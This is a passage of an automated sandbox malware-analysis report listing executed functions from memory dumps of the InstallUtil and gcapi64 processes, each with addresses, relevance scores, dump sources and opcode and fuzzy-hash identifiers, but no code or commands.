                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01c3023d6fce2fc31871fb6e3f14dde506434a55e24a52397b7a5d6d1a262383
                                                                  • Instruction ID: 8c1563f4619aaef2d14149dabae4d5fd343e031b06cf8c000d586b55b64973a1
                                                                  • Opcode Fuzzy Hash: 01c3023d6fce2fc31871fb6e3f14dde506434a55e24a52397b7a5d6d1a262383
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 00007FFD9B77654C Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbb07057fd0cd9287816f1055b14fdd3d412a9ba124631b5efced9075fa63287
                                                                  • Instruction ID: c8d4ac7684b62dc83694dad845ae9a134343e7d7b0db6bb1feedc0b11eaf459d
                                                                  • Opcode Fuzzy Hash: fbb07057fd0cd9287816f1055b14fdd3d412a9ba124631b5efced9075fa63287
                                                                  • Instruction Fuzzy Hash:

                                                                  Executed Functions

                                                                  Function 00007FFD9BA18411 Relevance: 1.9, Strings: 1, Instructions: 613COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: 48d1a7647a7485bb459c0053093599faaacc7342bc00bdb71094dac40f6ae2f2
                                                                  • Instruction ID: b3ddeaaef6eac3d71349f24165ae076e47429aca7851c2673122cada79e46a4a
                                                                  • Opcode Fuzzy Hash: 48d1a7647a7485bb459c0053093599faaacc7342bc00bdb71094dac40f6ae2f2
                                                                  • Instruction Fuzzy Hash: 68020031B1DA094FE7A8DF5888A457573E1FF98320B2445BED44ACB2A7DE25EC42C781
                                                                  Function 00007FFD9B7A5511 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?_H
                                                                  • API String ID: 0-1095511010
                                                                  • Opcode ID: f95c8ed8dbc077574ab24a5927c59682e5ed176f50df9e686be15e20d5d6e832
                                                                  • Instruction ID: c633a45044268072a71a6e5acf3ab571a2e5b5b98a903b63697809a7d1a04b1f
                                                                  • Opcode Fuzzy Hash: f95c8ed8dbc077574ab24a5927c59682e5ed176f50df9e686be15e20d5d6e832
                                                                  • Instruction Fuzzy Hash: A8911871E1A61D8FEFA4DB98C4657EC77B2FF58300F510279D409E72A1DA386981CB80
                                                                  Function 00007FFD9B6DF9B4 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: JL_^
                                                                  • API String ID: 0-496840329
                                                                  • Opcode ID: 2eebb00833c40ff46cea291097c3ff059fb5c82dbaa0ab136539ad99b611bcda
                                                                  • Instruction ID: e786b40ac7931a70f985f2966f6d410e35368e7028cbb06f7e4ca220c0328210
                                                                  • Opcode Fuzzy Hash: 2eebb00833c40ff46cea291097c3ff059fb5c82dbaa0ab136539ad99b611bcda
                                                                  • Instruction Fuzzy Hash: 6D31B416B0D09646E71577BCB8768FA3F90CF46239B4C86F3E4ED4D0DBDE1864898285
                                                                  Function 00007FFD9B7A4CA2 Relevance: .7, Instructions: 684COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eef705cdc1d3a2882799de159fbcda21e0df18ed11a89460f91f1553cbe482be
                                                                  • Instruction ID: eff19efdbe80a7311f7212ed290e6e0c537ddaf64e36be8ce518e8dec049fbf7
                                                                  • Opcode Fuzzy Hash: eef705cdc1d3a2882799de159fbcda21e0df18ed11a89460f91f1553cbe482be
                                                                  • Instruction Fuzzy Hash: B3227271E0AA5E9FEFE0DA9888657AD77B2FF68340F110275C40DD31B1DE3969468B80
                                                                  Function 00007FFD9B7A581F Relevance: .5, Instructions: 542COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba7a97e40edc84972f4bb11f414c2187a6a4ebcd9dccfcb9b4f3b70e9f39ba98
                                                                  • Instruction ID: 3a84152f01fef721834b1c4f36b90689051011b6a24064f7f6f65c39df19a43f
                                                                  • Opcode Fuzzy Hash: ba7a97e40edc84972f4bb11f414c2187a6a4ebcd9dccfcb9b4f3b70e9f39ba98
                                                                  • Instruction Fuzzy Hash: CA12C971E0AA1E8FEBA4DB98C4A57AC77B1FF58301F510279D00DA72B1DB356A85CB40
                                                                  Function 00007FFD9B7A11D4 Relevance: .4, Instructions: 413COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9aed6c4e0b1a7735e434359608c33d61a50be0149b979c25e05738716b7bd7de
                                                                  • Instruction ID: 233440e155a71d7730d937427d5c809062ac1290ebbf744da21b262ce352448c
                                                                  • Opcode Fuzzy Hash: 9aed6c4e0b1a7735e434359608c33d61a50be0149b979c25e05738716b7bd7de
                                                                  • Instruction Fuzzy Hash: 2DD10672B0FB8A4FFBE5AA6C48755B877D1EF56210F0902BAD459C79F3DA18A900C341
                                                                  Function 00007FFD9BA21BA6 Relevance: .4, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46f83fa82ade279a03f6320933f736cf1731cd05695f30d0d246421b37dbf084
                                                                  • Instruction ID: ce9b833b5004087a6e82454e9cb9f863c0b99bbd179552f398ea71164f34ca00
                                                                  • Opcode Fuzzy Hash: 46f83fa82ade279a03f6320933f736cf1731cd05695f30d0d246421b37dbf084
                                                                  • Instruction Fuzzy Hash: CDC14931B0EA8D4FEBA5D76CC8656743BE1EFA5310B0A01BAD04DC72A3DE59AD468341
                                                                  Function 00007FFD9BA21365 Relevance: .4, Instructions: 398COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64b4646ad41c1039f857c5f0418283e8a2efe2e52669f68aa1ba63f69807fbd4
                                                                  • Instruction ID: a94ebf94fcfba3932c51dc1441eb6d5bd83d07c745774f4a0c8de471bdce3f3f
                                                                  • Opcode Fuzzy Hash: 64b4646ad41c1039f857c5f0418283e8a2efe2e52669f68aa1ba63f69807fbd4
                                                                  • Instruction Fuzzy Hash: 24C15A3160EA4D4FEFA9DF68D8655B837E1FFA5350B0501BED44EC71A2DE65A802C780
                                                                  Function 00007FFD9BA19420 Relevance: .4, Instructions: 388COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1307cbfcd3fd7f289a2f552a32ba94ee015f764effc66a96ea78323bd42a11e4
                                                                  • Instruction ID: 6fd12f428a11cd0471fcf9940b4f2bae241e1943f2ef897c2f410560058a0deb
                                                                  • Opcode Fuzzy Hash: 1307cbfcd3fd7f289a2f552a32ba94ee015f764effc66a96ea78323bd42a11e4
                                                                  • Instruction Fuzzy Hash: 31C13835A0EA8D0FD7A6E77888656E53FA0EF55310B0901FAD4ADCF1F3DE1869068741
                                                                  Function 00007FFD9B6E001D Relevance: .4, Instructions: 357COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d0158d0c088623d39d05bc6538af5fa162f341510ebc10074c4ddd9793fffd4
                                                                  • Instruction ID: 56135934ee4028863f73612b262f013d1055586a91351f260163a38ffcf547ea
                                                                  • Opcode Fuzzy Hash: 5d0158d0c088623d39d05bc6538af5fa162f341510ebc10074c4ddd9793fffd4
                                                                  • Instruction Fuzzy Hash: 74B12772B0E6994FD715EBACE8625ED7FA0EF42325F0401BBD489CF1A3DE2464468781
                                                                  Function 00007FFD9BA12294 Relevance: .4, Instructions: 355COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5e3178ddeff437456fea453ac0ec174bd37c47484fe4bcfc68d55135131d73d
                                                                  • Instruction ID: ea939d41dd8ffe99441cb0ab15dc6f90c7fcfed66f457034d5fd25384db96554
                                                                  • Opcode Fuzzy Hash: f5e3178ddeff437456fea453ac0ec174bd37c47484fe4bcfc68d55135131d73d
                                                                  • Instruction Fuzzy Hash: 57D1E170A09B4D8FEBA4DF98D8517A973E1FF54308F2041ADD089971A2DBB5ED82CB00
                                                                  Function 00007FFD9B7A083F Relevance: .3, Instructions: 344COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5781e82525b87a7978f36eb7418b7dcc5ee440325366927b2f9d7c3381c1fb92
                                                                  • Instruction ID: 9fdf75eee70d86ebc9e044b7ffa2c6e90b0c73b920265bd87bfbc0ef0d4afd21
                                                                  • Opcode Fuzzy Hash: 5781e82525b87a7978f36eb7418b7dcc5ee440325366927b2f9d7c3381c1fb92
                                                                  • Instruction Fuzzy Hash: F6A11672B0EB8E4FEBE59A6C48A56B87BD1EF55710B0906BAD05CC71F3DE14AC058381
                                                                  Function 00007FFD9BA24306 Relevance: .3, Instructions: 336COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d29478c4bdc8fa3b748dd2170cfc9087cf03b2fe37f95425db98249c26de816
                                                                  • Instruction ID: 8e3fbc7a8b039e027a01a98bf6f597fe88fb74ff329120d630430f2e8befe2fd
                                                                  • Opcode Fuzzy Hash: 1d29478c4bdc8fa3b748dd2170cfc9087cf03b2fe37f95425db98249c26de816
                                                                  • Instruction Fuzzy Hash: DEA1A530B09A1D8FEB99EB68D4647A977E2FF58310F1500BDD04EC72A6CE69AD428740
                                                                  Function 00007FFD9BA19428 Relevance: .3, Instructions: 323COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 865bcf9ac497ee14a8f09c8a8ee30787af150686d62ef591052759ac34bd1d63
                                                                  • Instruction ID: 42bf17eafbccab14f186796bc3c641d2c81654489118fd07c21b1ef7b48e34e3
                                                                  • Opcode Fuzzy Hash: 865bcf9ac497ee14a8f09c8a8ee30787af150686d62ef591052759ac34bd1d63
                                                                  • Instruction Fuzzy Hash: 5EA1F731B0E95D4FEBB4EB688861BA977E1EF99700F4100B9D04DD32A2DE75AD45CB40
                                                                  Function 00007FFD9B7A1C8C Relevance: .3, Instructions: 315COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3871e06d6d22233cbd3012f8edbdb59f847c62716ce2fd2e64cff933a055919a
                                                                  • Instruction ID: 28953c559105a531f6cf7ca72015581ca3f2e8fbea3aa93f0c613b3ee2996a37
                                                                  • Opcode Fuzzy Hash: 3871e06d6d22233cbd3012f8edbdb59f847c62716ce2fd2e64cff933a055919a
                                                                  • Instruction Fuzzy Hash: 4E911322B0FB8E0FFBE99A6848646B57BD1EF56250B0902BAE05DC74E3DD18AD05C341
                                                                  Function 00007FFD9BA103C5 Relevance: .3, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58e15e134dda290f6183fc8e6ee2806b98fbe0eccfec7189336e1fbda80d7cce
                                                                  • Instruction ID: 7813ed21f008f62b8a03e815ea2a3603ce808285f5a52bdbb195417512ba540e
                                                                  • Opcode Fuzzy Hash: 58e15e134dda290f6183fc8e6ee2806b98fbe0eccfec7189336e1fbda80d7cce
                                                                  • Instruction Fuzzy Hash: A971593171D94C0FE7A8EB6CA8656B537D1EF9A320B0541BAE48DC72A7DD25EC438381
                                                                  Function 00007FFD9BA11455 Relevance: .2, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f2dee4f38e8eac8b7a48f186a155789931db69f31b1bbaf91d23ec4a4536102
                                                                  • Instruction ID: 9a8a94e5951e9a83f235084dbe0008fc559c49dcccd59f1bcdbd86e36ba54b7a
                                                                  • Opcode Fuzzy Hash: 9f2dee4f38e8eac8b7a48f186a155789931db69f31b1bbaf91d23ec4a4536102
                                                                  • Instruction Fuzzy Hash: 51818170A1AA4D8FEBD4DB68C864BA977E1FF68304F5440E8D44DDB2A2DA35ED41CB00
                                                                  Function 00007FFD9B7A24AC Relevance: .2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f287dc2b7588218044db7fb9693fa2acf2a880166457cc4e612900b7eb4a11d8
                                                                  • Instruction ID: 7f3e3f9bd7bfc5c594a7ec7e2fef20b3a787408561c06bb11bc47adc6e84477c
                                                                  • Opcode Fuzzy Hash: f287dc2b7588218044db7fb9693fa2acf2a880166457cc4e612900b7eb4a11d8
                                                                  • Instruction Fuzzy Hash: A351FB32B0EE0E4BEBF896AC15756B572C1FF94710F5A02BAD41EC31F5DD14AD054281
                                                                  Function 00007FFD9B6E0180 Relevance: .2, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8196e143578bda398b0e8891bf6ce9aa3a370fbee2bd0062e750182989f9ce5
                                                                  • Instruction ID: 8fd6b03a86f2f47f0bacbaf54724cbc52e932b4598b83ae82113b7f4d9a449f2
                                                                  • Opcode Fuzzy Hash: e8196e143578bda398b0e8891bf6ce9aa3a370fbee2bd0062e750182989f9ce5
                                                                  • Instruction Fuzzy Hash: 2A51E572A0965D8FDB44EBA8E455AEDBFA0FF58324F0401BBD449DB1A7DF34A8418780
                                                                  Function 00007FFD9B6D4ACE Relevance: .2, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 00a590be2ce36d9bc4a4328586527542b48124e50c41bfde810d787b2a99264d
                                                                  • Instruction ID: 5c2bc8d4ed195b5df2e8882ef9945488c568af29799df63ff4b632ca0b4f77a0
                                                                  • Opcode Fuzzy Hash: 00a590be2ce36d9bc4a4328586527542b48124e50c41bfde810d787b2a99264d
                                                                  • Instruction Fuzzy Hash: CE51297160D7888FD759DFA888657A97BE0EF96310F0442BFD099CB2E3DA246C45CB11
                                                                  Function 00007FFD9B6DBF6E Relevance: .2, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f232347e11b8d7d2605f4d4b1076e61fb8f0da42a082c4b8a56ba80595f86dea
                                                                  • Instruction ID: 10455d5711d46797cab7d7ee7b03cf186f518e7f361f164fa9987e4883ce7554
                                                                  • Opcode Fuzzy Hash: f232347e11b8d7d2605f4d4b1076e61fb8f0da42a082c4b8a56ba80595f86dea
                                                                  • Instruction Fuzzy Hash: 1351F421B0954D0FEB98E7BC986897833D2EFD924174601BAE41DCF2B7EE19BC424340
                                                                  Function 00007FFD9BA1CB62 Relevance: .2, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81e87ce2cd1062cb84d9faf36d693435b36bc328f3de26c90799dd8af90c4660
                                                                  • Instruction ID: 392d1bdc4ded6055e08f432a006ae6a1b7c1d85d661f0c3cf48b01b7b3338966
                                                                  • Opcode Fuzzy Hash: 81e87ce2cd1062cb84d9faf36d693435b36bc328f3de26c90799dd8af90c4660
                                                                  • Instruction Fuzzy Hash: 1451C432B0DA4D4FEBA8DB5C94A57A533C2EBA8710F15417AD44DC72A6DE29EC428780
                                                                  Function 00007FFD9BA15310 Relevance: .2, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87519d1f71ae4517e86fb48d4fc6ef77ba29f1afab6bca37bfed7d8e4d953f20
                                                                  • Instruction ID: 124adf7f4717d4569c4a4ffd29d98f835c935b0aaa6c6b6970cd7120798c473d
                                                                  • Opcode Fuzzy Hash: 87519d1f71ae4517e86fb48d4fc6ef77ba29f1afab6bca37bfed7d8e4d953f20
                                                                  • Instruction Fuzzy Hash: 64510730B0DA094BE7AC9A599465375B6C2FF58304F65417CE88FC72E3CD7CAD458284
                                                                  Function 00007FFD9B6E01F2 Relevance: .2, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fc09fc783dfcc73d3aa187238223474fc7526ea750e9a503af48387b2365c6f3
                                                                  • Instruction ID: 7154e45f3183eb8e4e00134f6bb7fc41ca2d31b38ff242afb60f96394e11c16e
                                                                  • Opcode Fuzzy Hash: fc09fc783dfcc73d3aa187238223474fc7526ea750e9a503af48387b2365c6f3
                                                                  • Instruction Fuzzy Hash: 3251E372A09A5D8FDB44EBA8E855AED7BE0FF58314F0401BEE409DB197CF34A8418780
                                                                  Function 00007FFD9B6DCB80 Relevance: .2, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c07702d98ddc12e2fc46378f36bbde00d1ac3327bc0b87c413da5334d39260f
                                                                  • Instruction ID: 8d659caf6fd1af904faeb9e80962704d994a0bd4f8a84c0d403fa1899505c3b3
                                                                  • Opcode Fuzzy Hash: 3c07702d98ddc12e2fc46378f36bbde00d1ac3327bc0b87c413da5334d39260f
                                                                  • Instruction Fuzzy Hash: 5E41F937B0D65D0FE724AA6CAC618EA3B61EFC1360F5543BAE1698B0E3DD25B5074680
                                                                  Function 00007FFD9B7A1308 Relevance: .1, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c429eb5bfcec05a6b4f410ba9d4feafeae7224bac533332626044352a3fef376
                                                                  • Instruction ID: 6996ecce45ff7e8975ae0488269453eea40eda0be4eb390fb8043d1e0c93930a
                                                                  • Opcode Fuzzy Hash: c429eb5bfcec05a6b4f410ba9d4feafeae7224bac533332626044352a3fef376
                                                                  • Instruction Fuzzy Hash: 0841E662F0FB9A4FF7F8AA6848B51B876D1AF56240B0A01BAD49DC79F3DD186C40C301
                                                                  Function 00007FFD9B6DE011 Relevance: .1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 586dc9e86056336982c8d149018fa46bbf8cecba93009cba4bb2df3263954626
                                                                  • Instruction ID: 82976abdb07ea45cd361fdb78a35fb0934e7b27400f45f2fd9536e9d0fb2d336
                                                                  • Opcode Fuzzy Hash: 586dc9e86056336982c8d149018fa46bbf8cecba93009cba4bb2df3263954626
                                                                  • Instruction Fuzzy Hash: 2341989594E3C50FD723A3B84C74AA27FB09F83215B0E45EBE0D4CB0A3E508185AC352
                                                                  Function 00007FFD9B6DFF5D Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7bb91b186af928ea6c03f444f228071bddb93f4cf651aa3546ced58cb438335
                                                                  • Instruction ID: b3411a215e787bacff7ec6a52e10c977c23c976a27a5f77bad9a99d563b0a1e3
                                                                  • Opcode Fuzzy Hash: a7bb91b186af928ea6c03f444f228071bddb93f4cf651aa3546ced58cb438335
                                                                  • Instruction Fuzzy Hash: 5B41C030E19A4D8EEB55EFA8E8596ED7BE0FF04304F4005BAE82CC61A1DF34A294C741
                                                                  Function 00007FFD9B6DBDC5 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
